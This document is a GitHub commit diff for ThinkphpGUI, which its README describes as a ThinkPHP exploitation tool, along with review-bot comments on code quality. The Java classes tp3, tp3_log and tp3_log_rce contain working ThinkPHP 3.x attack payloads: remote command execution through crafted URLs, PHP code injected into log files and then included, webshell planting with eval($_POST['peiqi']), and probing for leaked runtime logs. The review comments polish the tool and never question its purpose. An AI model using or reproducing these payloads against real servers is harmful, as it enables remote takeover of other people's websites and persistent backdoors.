
Commit 14f5295

committed
no message
1 parent e435694 commit 14f5295

25 files changed

+1657
-1
lines changed

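--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
 # ThinkPHPGUI
 
 * Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的 ⭐️❗️)
-* JFormDesigner可视化编写,没有javafx可视化好用。
+* JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)
 * 检测不到的payload欢迎提交payload至issues。
 
 **V1.3**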

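--- a/ThinkphpGUI/ThinkphpGUI.iml
+++ b/ThinkphpGUI/ThinkphpGUI.iml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4" />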
76 KB
Binary file not shown.

ThinkphpGUI/lib/swing-layout-src.zip

68.2 KB
Binary file not shown.

ThinkphpGUI/lib/swing-layout.jar

115 KB
Binary file not shown.

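--- a/ThinkphpGUI/pom.xml
+++ b/ThinkphpGUI/pom.xml
@@ -0,0 +1,63 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<modelVersion>4.0.0</modelVersion>
+<dependencies>
+<dependency>
+<groupId>com.github.kevinsawicki</groupId>
+<artifactId>http-request</artifactId>
+<version>6.0</version>
+</dependency>
+
+</dependencies>
+<groupId>org.example</groupId>
+<artifactId>ThinkphpGUI</artifactId>
+<version>1.3-SNAPSHOT</version>
+<profiles>
+<profile>
+<id>jdk-1.8</id>
+<activation>
+<activeByDefault>true</activeByDefault>
+<jdk>1.8</jdk>
+</activation>
+<properties>
+<maven.compiler.source>1.8</maven.compiler.source>
+<maven.compiler.target>1.8</maven.compiler.target>
+<maven.compiler.compilerVersion>1.8</maven.compiler.compilerVersion>
+</properties>
+</profile>
+</profiles>
+
+<build>
+<plugins>
+<plugin>
+<groupId>org.apache.maven.plugins</groupId>
+<artifactId>maven-assembly-plugin</artifactId>
+<configuration>
+<appendAssemblyId>false</appendAssemblyId>
+<descriptorRefs>
+<descriptorRef>jar-with-dependencies</descriptorRef>
+</descriptorRefs>
+<archive>
+<manifest>
+<mainClass>App</mainClass>
+</manifest>
+</archive>
+</configuration>
+<executions>
+<execution>
+<id>make-assembly</id>
+<phase>package</phase>
+<goals>
+<goal>assembly</goal>
+</goals>
+</execution>
+</executions>
+</plugin>
+
+</plugins>
+</build>
+
+
+</project>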
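Review bot: The `maven-assembly-plugin` declaration has no `<version>`, so the plugin version is whatever the local Maven installation resolves, and the bound goal `assembly` is the deprecated form that later plugin releases removed, so the same POM can build on one machine and fail on another. Pin the plugin with `<version>PLUGIN_VERSION</version>` (placeholder; choose and record the release you have verified) and bind `<goal>single</goal>`. The commit also adds binary archives under `ThinkphpGUI/lib/` that this POM does not declare; if the build depends on them, declaring them as versioned dependencies would keep the inputs of the shaded jar auditable.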

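--- a/ThinkphpGUI/src/main/java/App.java
+++ b/ThinkphpGUI/src/main/java/App.java
@@ -0,0 +1,15 @@
+import view.tp_view;
+
+import javax.swing.*;
+
+/**
+* Author 莲花 2021/6/15
+*/
+public class App {
+public static void main(String[] args) throws Exception {
+tp_view f = new tp_view();
+f.setLocationRelativeTo(null);
+f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
+f.setVisible(true);
+}
+}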
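Review bot: `main` constructs and shows the `tp_view` frame on the main thread, but Swing components should be created and made visible on the event dispatch thread. Wrap the four statements in `SwingUtilities.invokeLater(() -> { ... });`. The blanket `throws Exception` on `main` can then go, unless the `tp_view` constructor declares a checked exception, which this section does not show; in that case it would need handling inside the lambda. The wildcard `import javax.swing.*;` can be narrowed to `JFrame` and `SwingUtilities`.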
+60
@@ -0,0 +1,60 @@
1+
package exploit;
2+
3+
import com.github.kevinsawicki.http.HttpRequest;
4+
import util.BasePayload;
5+
import util.Module;
6+
import util.Result;
7+
8+
/**
9+
* Author 莲花 2021/6/20
10+
*/
11+
//thinkphp3.0
12+
public class tp3 implements BasePayload {
13+
@Override
14+
public Result checkVUL(String url) throws Exception {
15+
String CheckStr = "PHP Version";
16+
Module m = new Module();
17+
String module = m.getModule(url);
18+
String payload = url + "/?s=" + module + "/\\think\\module/action/param1/${@phpinfo()}";
19+
try {
20+
HttpRequest req = HttpRequest.get(url);
21+
if (req.body().contains(CheckStr)) {
22+
return new Result(true, "ThinkPHP 3.x RCE", payload);
23+
}
24+
} catch (Exception e) {
25+
e.printStackTrace();
26+
}
27+
return new Result(false, "ThinkPHP 3.x RCE", "");
28+
}
29+
30+
@Override
31+
public Result exeVUL(String url, String cmd) throws Exception {
32+
Module m = new Module();
33+
String module = m.getModule(url);
34+
String payload_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${system($_GET['x'])}}?x=" + cmd;
35+
try {
36+
String res = HttpRequest.get(payload_url).body();
37+
return new Result(true, null, res);
38+
} catch (
39+
Exception e) {
40+
e.printStackTrace();
41+
}
42+
return new Result(false, null, null);
43+
}
44+
45+
@Override
46+
public Result getShell(String url) throws Exception {
47+
try {
48+
Module m = new Module();
49+
String module = m.getModule(url);
50+
String shell_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${eval($_POST['peiqi'])}}";
51+
int code = HttpRequest.get(shell_url).code();
52+
if (code == 200) {
53+
return new Result(true, null, shell_url);
54+
}
55+
} catch (Exception e) {
56+
e.printStackTrace();
57+
}
58+
return new Result(false, null, null);
59+
}
60+
}
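Review bot: Each of `checkVUL`, `exeVUL` and `getShell` catches `Exception`, prints the stack trace and falls through to `new Result(false, ...)`, so a timeout, DNS failure or TLS error is reported exactly like a negative finding. Someone assessing their own host would read "not vulnerable" when the request never completed. The methods already declare `throws Exception`, so either let the failure propagate or return a `Result` whose message carries the error text. None of the calls sets a time limit either; `HttpRequest.get(url).connectTimeout(5000).readTimeout(5000)` would keep a hung connection from blocking the caller. The same catch-and-continue pattern appears in the `tp3_log` and `tp3_log_rce` sections of this commit.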
@@ -0,0 +1,92 @@
1+
package exploit;
2+
3+
import com.github.kevinsawicki.http.HttpRequest;
4+
import util.BasePayload;
5+
import util.Result;
6+
7+
import java.util.ArrayList;
8+
import java.util.Date;
9+
10+
/**
11+
* Author 莲花 2021/6/27
12+
*/
13+
public class tp3_log implements BasePayload {
14+
@Override
15+
public Result checkVUL(String url) throws Exception {
16+
String CheckStr = "INFO:";
17+
String CheckErr = "[ error ]";
18+
Date dt = new Date();
19+
String year = String.format("%tY", dt);
20+
String mon = String.format("%tm", dt);
21+
String day = String.format("%td", dt);
22+
String sjc = String.valueOf(dt.getTime()).substring(0, 10);
23+
String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
24+
String suffix2 = sjc + "-" + year.substring(2, 4) + "_" + mon + "_" + day + ".log";
25+
ArrayList<String> payload_urls = new ArrayList<String>() {{
26+
add(url + "/Runtime/Logs/" + suffix1);
27+
add(url + "/Runtime/Logs/" + suffix2);
28+
29+
add(url + "/Runtime/Logs/Home/" + suffix1);
30+
add(url + "/Runtime/Logs/Home/" + suffix2);
31+
32+
add(url + "/Runtime/Logs/Common/" + suffix1);
33+
add(url + "/Runtime/Logs/Common/" + suffix2);
34+
35+
add(url + "/App/Runtime/Logs/" + suffix1);
36+
add(url + "/App/Runtime/Logs/" + suffix2);
37+
38+
add(url + "/App/Runtime/Logs/Home/" + suffix1);
39+
add(url + "/App/Runtime/Logs/Home/" + suffix2);
40+
41+
add(url + "/Application/Runtime/Logs/" + suffix1);
42+
add(url + "/Application/Runtime/Logs/" + suffix2);
43+
44+
add(url + "/Application/Runtime/Logs/Admin/" + suffix1);
45+
add(url + "/Application/Runtime/Logs/Admin/" + suffix2);
46+
47+
add(url + "/Application/Runtime/Logs/Home/" + suffix1);
48+
add(url + "/Application/Runtime/Logs/Home/" + suffix2);
49+
50+
add(url + "/Application/Runtime/Logs/App/" + suffix1);
51+
add(url + "/Application/Runtime/Logs/App/" + suffix2);
52+
53+
add(url + "/Application/Runtime/Logs/Ext/" + suffix1);
54+
add(url + "/Application/Runtime/Logs/Ext/" + suffix2);
55+
56+
add(url + "/Application/Runtime/Logs/Api/" + suffix1);
57+
add(url + "/Application/Runtime/Logs/Api/" + suffix2);
58+
59+
add(url + "/Application/Runtime/Logs/Test/" + suffix1);
60+
add(url + "/Application/Runtime/Logs/Test/" + suffix2);
61+
62+
add(url + "/Application/Runtime/Logs/Common/" + suffix1);
63+
add(url + "/Application/Runtime/Logs/Common/" + suffix2);
64+
65+
add(url + "/Application/Runtime/Logs/Service/" + suffix1);
66+
add(url + "/Application/Runtime/Logs/Service/" + suffix2);
67+
}};
68+
try {
69+
for (String payload_url : payload_urls) {
70+
String res = HttpRequest.get(payload_url).body();
71+
if (res.contains(CheckStr)||res.contains(CheckErr)) {
72+
return new Result(true, "ThinkPHP 3.x 日志泄露", payload_url);
73+
}
74+
}
75+
76+
} catch (Exception e) {
77+
e.printStackTrace();
78+
}
79+
80+
return new Result(false, "ThinkPHP 3.x 日志泄露", "");
81+
}
82+
83+
@Override
84+
public Result exeVUL(String url, String cmd) throws Exception {
85+
return new Result(false, "", "");
86+
}
87+
88+
@Override
89+
public Result getShell(String url) throws Exception {
90+
return new Result(false, "", "");
91+
}
92+
}
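Review bot: `checkVUL` builds its candidate list with double-brace initialization (`new ArrayList<String>() {{ ... }}`), which defines an anonymous `ArrayList` subclass on every call and captures the enclosing instance; the 28 hand-written `add` calls also repeat the same two suffixes for each directory. A `private static final String[]` of directory prefixes and a loop that appends `suffix1` and `suffix2` to each would keep the directory list in one place and use a plain `new ArrayList<>()`. The stub `exeVUL` and `getShell` return `new Result(false, "", "")`, while `tp3` returns `new Result(false, null, null)` for the same outcome; pick one convention so callers need a single check.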
@@ -0,0 +1,87 @@
1+
package exploit;
2+
3+
import com.github.kevinsawicki.http.HttpRequest;
4+
import util.BasePayload;
5+
import util.Result;
6+
7+
import java.util.ArrayList;
8+
import java.util.Date;
9+
10+
/**
11+
* Author 莲花 2021/7/21
12+
*/
13+
public class tp3_log_rce implements BasePayload {
14+
Date dt = new Date();
15+
String year = String.format("%tY", dt);
16+
String mon = String.format("%tm", dt);
17+
String day = String.format("%td", dt);
18+
String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
19+
20+
@Override
21+
public Result checkVUL(String url) throws Exception {
22+
String CheckStr = "PHP Version";
23+
24+
String payload_log = url + "?m=Home&c=Index&a=index&test=--><?=phpinfo();?>";
25+
ArrayList<String> log_rces = new ArrayList<String>() {{
26+
add(url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
27+
add(url + "/?m=Home&c=Index&a=index&info[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
28+
add(url + "/?m=Home&c=Index&a=index&param[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
29+
add(url + "/?m=Home&c=Index&a=index&name[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
30+
add(url + "/?m=Home&c=Index&a=index&array[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
31+
add(url + "/?m=Home&c=Index&a=index&arr[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
32+
add(url + "/?m=Home&c=Index&a=index&list[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
33+
add(url + "/?m=Home&c=Index&a=index&page[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
34+
add(url + "/?m=Home&c=Index&a=index&menus[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
35+
add(url + "/?m=Home&c=Index&a=index&var[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
36+
add(url + "/?m=Home&c=Index&a=index&data[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
37+
add(url + "/?m=Home&c=Index&a=index&module[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
38+
}};
39+
for (String log_rce : log_rces) {
40+
try {
41+
String log = HttpRequest.get(payload_log).body();
42+
String res = HttpRequest.get(log_rce).body();
43+
if (res.contains(CheckStr)) {
44+
return new Result(true, "ThinkPHP 3.x Log RCE", log_rce);
45+
}
46+
} catch (Exception e) {
47+
e.printStackTrace();
48+
}
49+
}
50+
return new Result(false, "ThinkPHP 3.x Log RCE", "");
51+
}
52+
53+
@Override
54+
public Result exeVUL(String url, String cmd) throws Exception {
55+
String log_exe = url + "/?m=Home&c=Index&a=index&test=--><?=system('"+cmd+"');?>";
56+
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
57+
try {
58+
String log = HttpRequest.get(log_exe).body();
59+
int code = HttpRequest.get(log_res).code();
60+
if (code == 200) {
61+
return new Result(true, null, log_res);
62+
}
63+
}
64+
catch (Exception e) {
65+
e.printStackTrace();
66+
}
67+
return new Result(false, null, "");
68+
}
69+
70+
@Override
71+
public Result getShell(String url) throws Exception {
72+
String log_shell = url + "/?m=Home&c=Index&a=index&test=--><?=@eval($_POST['peiqi']);?>";
73+
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
74+
try {
75+
String log = HttpRequest.get(log_shell).body();
76+
int code = HttpRequest.get(log_res).code();
77+
if (code == 200) {
78+
return new Result(true, null, log_res+" Pass:peiqi");
79+
}
80+
}
81+
catch (Exception e) {
82+
e.printStackTrace();
83+
}
84+
return null;
85+
}
86+
87+
}
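Review bot: `getShell` ends with `return null;` on failure, whereas `checkVUL` and `exeVUL` in this class and the methods in `tp3` and `tp3_log` always return a `Result`; a caller that reads the result without a null check will throw `NullPointerException`. Replace it with `return new Result(false, null, "");` to match `exeVUL`. The fields `dt`, `year`, `mon`, `day` and `suffix1` are package-private and non-final; declare them `private final`. The locals named `log` in all three methods are assigned and never read, so the call can stand as a bare statement with a comment saying the response body is intentionally discarded.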
